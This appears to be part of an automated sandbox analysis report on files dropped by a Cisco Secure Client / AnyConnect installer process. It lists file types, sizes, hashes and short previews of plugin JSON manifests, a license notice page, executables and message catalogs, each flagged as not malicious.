                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "component" : [.. {.. "dependencies" : [.. {.. "condition" : [.. {.. "architecture" : "x86".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "require" : [.. {.. "version" : "5.0.04021".. }.. ],.. "type" : "component".. },.. {.. "condition" : [.. {.. "architecture" : "x86_64".. },.. {.. "platform" : "windows".. }.. ],.. "display_name" : "AnyConnect Kernel Driver Framework",.. "id" : "com.cisco.anyconnect.kdf",.. "requ
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):556
                                                                                                                                                                                                  Entropy (8bit):4.645067217480077
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:VKYMF1IXH5EkqfXMF1ITOLKvXwCPijecTygdLe3f8ytWHtO+PGb:iF1a6AF1owBlPkNtWNa
                                                                                                                                                                                                  MD5:A54C8C0CFD88CFE16115DCFF322A637A
                                                                                                                                                                                                  SHA1:DFD99A331FE511542CEE60731DE1F603AB11C3AD
                                                                                                                                                                                                  SHA-256:50695A74F95C74DE1888A94F9BB0DC19E0237500DDD2352D56E4A17F30324AF5
                                                                                                                                                                                                  SHA-512:BDB7E36EBE6F0A9A1F2662C89B4F253A7F354C7A5F2596EE3C52247CA25AF9A6F14B75D432B68DFACFB3611533A0E88648D5F7F3E72099AAFCA4BFA833029AAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:<html>.. <head>.. <title>Open Source Used In Cisco AnyConnect Secure Mobility Client</title>.. </head>.. <body>.. <h1>Open Source Used In Cisco AnyConnect Secure Mobility Client</h1>.. <br/>.. <h3>Please refer to <a href="https://www.cisco.com/go/opensource">Open Source in Cisco Products</a> for the latest information on the open source used in Cisco AnyConnect Secure Mobility Client.</h3>.. <br/>.. <p><font size="2">&copy;2023 Cisco Systems, Inc. All rights reserved.</font></p>.. </body>..</html>
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3908712
                                                                                                                                                                                                  Entropy (8bit):6.887797216959267
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:1R8wYv1zxStjGudpDcpXkuHdMRwou2pMOLmFn+d8tPB19nW/7BioqbCJ6JMfS20A:1R8w66ttdpDcpUs48nOL6+y719nWTT
                                                                                                                                                                                                  MD5:2A1D5A1BEB44C39B287BB7B9D34DC94E
                                                                                                                                                                                                  SHA1:F6BBD68D77978793BC348E181A1E8D2130C12AD3
                                                                                                                                                                                                  SHA-256:586085F4C7928D93E7C941705837506A69302168347136346D6784F78E67BBDD
                                                                                                                                                                                                  SHA-512:F05F14327B6C341444463CD774358D241655C06D910BAC2F72F007CD1052CE0832697E4F386C2F0810BE501F1E992B6E390A7484CCCEBFD0BB8522E7930246F3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.323029521506045
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                                                                                  MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                                                                                  SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                                                                                  SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                                                                                  SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):118
                                                                                                                                                                                                  Entropy (8bit):4.356540827709149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                                                                                  MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                                                                                  SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                                                                                  SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                                                                                  SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.383545038270626
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                                                                                  MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                                                                                  SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                                                                                  SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                                                                                  SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):115
                                                                                                                                                                                                  Entropy (8bit):4.299463045055552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                                                                                  MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                                                                                  SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                                                                                  SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
                                                                                                                                                                                                  SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.323029521506045
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TL2e2xcH9XyIMGLz1KCr:3FFYttNYTqegcHcIRP1fr
                                                                                                                                                                                                  MD5:B23D2052EB88D57B7EB5F3F6FE0B73DF
                                                                                                                                                                                                  SHA1:3B518BC2C90F511B0F026089E0EA617C532761CB
                                                                                                                                                                                                  SHA-256:EEAF72902741BE5DDA3A2C96DBC14545232A8CB4ABF97117AA8593D5876B182A
                                                                                                                                                                                                  SHA-512:38C528C6094EDD066C50509D970C8C3BDA08BD3206376BE79FA61453B216F14F1BA32E58A807C1EFD1C91A87C3E36953154299B78E1114379331D8BFC69A51F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnapishim.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                                  Entropy (8bit):4.383545038270626
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPDlSncH9XyIMGLz1KCr:3FFYttNYTnlSncHcIRP1fr
                                                                                                                                                                                                  MD5:288FCD2FDDC8001D274BCFB8B30AE9E0
                                                                                                                                                                                                  SHA1:4B0E7C4FBD55EBB687D5521F9CA234A1391DBBF5
                                                                                                                                                                                                  SHA-256:CCECC9DF3B737D1F56F4B34280919C8592D0585224E72D0E0ABD9D9A536AF2E6
                                                                                                                                                                                                  SHA-512:F5B3E7E1AEB03B5244387BD1856B3BC059BAF8D4A414D9E1A44F8CC7736EE34D6BF00903857E382D769E550B014ECB74E5A00D3A6022BAC09FA9FA4F38259A7A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acfeedback.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):115
                                                                                                                                                                                                  Entropy (8bit):4.299463045055552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLK8yH9XyIMGLz1KCr:3FFYttNYTmvHcIRP1fr
                                                                                                                                                                                                  MD5:769B51BA7501D6050DDC9A09C6A09B76
                                                                                                                                                                                                  SHA1:8BDE26C2B5B4AC5523C6B544147B01FF95A915D1
                                                                                                                                                                                                  SHA-256:4897DE44835053B78530EFAB879AD9BBC8C9480832757364FD953526F00D629A
                                                                                                                                                                                                  SHA-512:13A1DE06ECA2A5A2AFE33EBBCBF06BB9FFCC99F21D5E8216BCAC128AFDF9BCD9AFA57E3C4633E0006AAF0E43F11BC336986708D0ADAF154BC29F335F20723473
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "vpnipsec.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):118
                                                                                                                                                                                                  Entropy (8bit):4.356540827709149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:3FF1JsfF3dNH4TLPSifLBHcH9XyIMGLz1KCr:3FFYttNYT/LB8HcIRP1fr
                                                                                                                                                                                                  MD5:FCD4980A92383439E287B087524C7BD9
                                                                                                                                                                                                  SHA1:A91FE2BC7B81A89184D6861EEAB6359C43B1510A
                                                                                                                                                                                                  SHA-256:47FA628E122440B0292AA2F4D645EBE7B7536D4400C3EF7EAD4E1C28DD77BCFB
                                                                                                                                                                                                  SHA-512:D72AE7FAE4E5D95C37E4F5B1A08648662DBF7407DDBD1DCAE0C0D07A45D19E0C2D421BB079CE77AACC766608BF1A61E479F755479881226D368273A8BDFED38C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "plugin": {.. "relative-pathname": "acwebhelper.dll", .. "product-version": "5.0.05040".. }..}
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42600
                                                                                                                                                                                                  Entropy (8bit):6.850341851307747
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MoodVjT3FVIgFC1wTDRDGV5ENAMxGhDGVumuAMxkEX:norjT1VImC14DdxGhfxr
                                                                                                                                                                                                  MD5:0FA61F44C8C84022B2D7BC3D2D799562
                                                                                                                                                                                                  SHA1:6AB650840B91DF72F066A3D3882E5A8891F36E07
                                                                                                                                                                                                  SHA-256:65FD7DC0ED6E034BD6A956ABC357631B87B094A3587AAF91793233CC44E813EC
                                                                                                                                                                                                  SHA-512:FBB9156C946C1D110545ABCBB663A5A6B596EC4880F3400B4824728E5EF396B0976DFAF9F6E41377F3825DC7BC9D46DDB6BEA0172C9A51CEB55636D4722460B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3058280
                                                                                                                                                                                                  Entropy (8bit):6.02927936674107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                                                                                  MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                                                                                  SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                                                                                  SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                                                                                  SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124520
                                                                                                                                                                                                  Entropy (8bit):6.630785150590808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                                                                                  MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                                                                                  SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                                                                                  SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                                                                                  SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):124520
                                                                                                                                                                                                  Entropy (8bit):6.630785150590808
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:G32Q9YYQbxksfyuSq/NyDbUzb7DCp+iSc9lxma:IhvQSphq/M8vpc9ia
                                                                                                                                                                                                  MD5:0B9FFCA43DA7770F1D5C77C7E9B9B3FE
                                                                                                                                                                                                  SHA1:F4FF02AC97542DAA7AFFA5AF61E956752CCE1809
                                                                                                                                                                                                  SHA-256:329F104D7F9E76BC20CAF68BA7AFC081B7E85EC9DF50E42C715CED146DDF4041
                                                                                                                                                                                                  SHA-512:15F52C15D6A9BFCFA2EAC5045E1DE6087A2222ACD701C7DD2376C3178659C6D83D26E6AED1AF8DD2EF1E8F493B10E4EFE13010C8C670627C748890FFE160917C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3058280
                                                                                                                                                                                                  Entropy (8bit):6.02927936674107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:I4MfZ031DVdQtj3IDJyfxR6oSmmr2E2y/dVevljoZj8OdoiM/dBVxfkT2vfsLt70:mR3IDJy5R6Smr9/jevlj67KBVxfkQ
                                                                                                                                                                                                  MD5:24DE4ED3FF1FA997F867B591BE4E001D
                                                                                                                                                                                                  SHA1:744D45EBD394880598B597D882AE2B634B9261FB
                                                                                                                                                                                                  SHA-256:7C4330C4BD0C6890C7EFC49AF493056B92332C65BE2BF885CD2A599369BA5349
                                                                                                                                                                                                  SHA-512:8A32756CFFCD10D6DF5F0B6DA917A203115431FE101B2B7746B1D8E76956B12F6AF5CE89BCE29BC505558943F4D661D45E2630B4B5790625B968549146EBEC88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):350819
                                                                                                                                                                                                  Entropy (8bit):5.461097780903613
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMmeb7oVBKIuDVKuAYjG+chxEb1XVnh2MR+5+dJT8eRrDIpFmv0K1t:LjH3UKuVVBKfKh+qMR+5+dJTXDX1t
                                                                                                                                                                                                  MD5:2967DEC829A8EB7B1B28EDE05C47DCB8
                                                                                                                                                                                                  SHA1:F02FD55BF471D0BC97FE6F71ABC0A795B9C87475
                                                                                                                                                                                                  SHA-256:105BEB70A051B9C21C5C98EAB6F3C3E5EC01A54D6FDF25E86FD5BC9F113362DF
                                                                                                                                                                                                  SHA-512:A79CC293592DEF70B0C9EC83874DF23B4FA71DCAAA5C5656B2B0533BC7A91BCC8A65FCBF48124FD2E49D9CCA4B373E03F8294805F76BA19742377DA6856928FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):361321
                                                                                                                                                                                                  Entropy (8bit):5.209740954129793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK9dlRVBKfKh++1/nK0Gg4tIOIeJgzu7b:L7hD1/Eqi
                                                                                                                                                                                                  MD5:896374392BD925153CD66C80C719F912
                                                                                                                                                                                                  SHA1:E640B935A2400502607218A0ACA6CC281EFC26A5
                                                                                                                                                                                                  SHA-256:D8264819DB8F3D333ECAC920A8C7240878114F30610EAB49FD817005199A8D29
                                                                                                                                                                                                  SHA-512:3693C050D0E759439E1B03144F623AB735F268D44F97AC7E7726CAF10B5D43F7266EAD8BD8267F57B79AFEF35945BE8D9157F77C77AFCC367C77706600925EB5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):354736
                                                                                                                                                                                                  Entropy (8bit):5.123789642260049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM+Iy/aLiY2DBoVBKIuDVKuAYjG+chxEb1XVnhk0NrNQA/nUkSY:LjH3UKJZLiY2DyVBKfKh+w4i5ZY
                                                                                                                                                                                                  MD5:9D4300C87C9E378A13EFA9999D305929
                                                                                                                                                                                                  SHA1:0A7BB44A99208085296E782FD2E7B22170E7D03A
                                                                                                                                                                                                  SHA-256:D92D3E91F1B4036435CC6E39E2CE048DE7153A54577695313ACA1119DF70DE82
                                                                                                                                                                                                  SHA-512:297D7848FB011D8E79A7EE1B48D42227FC8582848B9232F4ED155B5FA1476C25654885FBD39E0207DD86F619BFC0FDE41A0D448365E5B1D57D7C359B7EAE3B1F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366110
                                                                                                                                                                                                  Entropy (8bit):5.203256685903476
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKZRI1w8uVBKfKh+EMVBfFUwKmXeEXNfl:L7hnRCgwKmXeEdfl
                                                                                                                                                                                                  MD5:283DE4CDF40608573B8CF8ACF853524A
                                                                                                                                                                                                  SHA1:43119C50A0F9459624D7CA1CCC9C65D0474EDC32
                                                                                                                                                                                                  SHA-256:6169558657F7D31BBA1335D14D8515877F0EBCF963604F54D7B8676F59437426
                                                                                                                                                                                                  SHA-512:63FAF192C420503F17700E9B757F864F997B76E3DC41BAA01F664672159FEFDC84F338BBA77B06E5D0DF29FA4A422CCA49FDDAC80F7F64C35570E9430972618F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362312
                                                                                                                                                                                                  Entropy (8bit):5.179123156153952
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKDGU3VBKfKh+GCaWCbQgoksGtxZMexJ8tjjNa+HTDzewKLMYspLW1UbwR+Q:L7hDGBRbBwR+Q
                                                                                                                                                                                                  MD5:0656A498B0ADF363A0D80BAF67A4C24B
                                                                                                                                                                                                  SHA1:A8D919E044EF0C20BDC2671F74EE38C3428C42D1
                                                                                                                                                                                                  SHA-256:F1BBF2D27C7CD80028E38E54097A975735F06035674BD991AAFF05429B479A30
                                                                                                                                                                                                  SHA-512:93D1603302BB59C25CB93B5012CAAB94A846092342CC947F508C46A7BE464F6C40B526E1F080E0536FF577DA74891EC51A3B3A65501547898AAABD71613FA84A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):362333
                                                                                                                                                                                                  Entropy (8bit):5.410491653751883
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKi/6g1JVBKfKh+KLOPdxLFCtnCCt+GawO+:L7hXgpOFxtn+
                                                                                                                                                                                                  MD5:E0D3819F0EB0197EF322DC22B375C578
                                                                                                                                                                                                  SHA1:F6E9928FA3CEF1B892703DE3EA394BF5D5A4DE52
                                                                                                                                                                                                  SHA-256:235C288B5B2A29BE8EA14140AA9D223314AD559545A39D4EEC7F5EB09C024DAD
                                                                                                                                                                                                  SHA-512:358574029EF1BCE7A9A20263155338EEA7A00BE9C2DA7215177A2674EB3655AF74BD11248F231F4A5EE2D0C27E0862ECD88B7B2BD6944328B91DD58BA71DE462
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):348721
                                                                                                                                                                                                  Entropy (8bit):5.110965971564126
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                                                                                  MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                                                                                  SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                                                                                  SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                                                                                  SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):348721
                                                                                                                                                                                                  Entropy (8bit):5.110965971564126
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                                                                                  MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                                                                                  SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                                                                                  SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
